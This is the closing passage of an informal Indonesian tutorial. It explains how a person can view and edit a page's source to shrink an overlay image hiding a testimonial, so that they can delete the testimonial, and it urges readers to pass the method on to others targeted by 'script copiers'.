*) Klik kanan (jangan di area gambar constructionnya) dan pilih View Source. Maka Notepad atau html editor sejenis akan terbuka.
*) Lakukan pencarian dengan menekan kombinasi tombol Ctrl+F. Masukkan salah satu keyword seperti di atas (Opera).
*) Ubah nilai dimensionnya (seperti cara di Opera).
*) Setelah itu, save hasil perubahan. File >> Save.
*) Kembali ke browser. Kini tekan F5 untuk me-refresh halamannya. Sim balasim…. Kini si korban bisa dengan leluasa membumihanguskan testi tersebut.
*) Contoh gambar: Gambar 6

Okayyyhh…kelar sudah tutorial ini. Sampaikan kepada yang lain mengenai cara ini. Jangan sampai ada yang menjadi korban para pencotek script lagi karena sesungguhnya mereka adalah …..<sensor>…..

Salam,
-sky73rx3 a.k.a sky73rx7-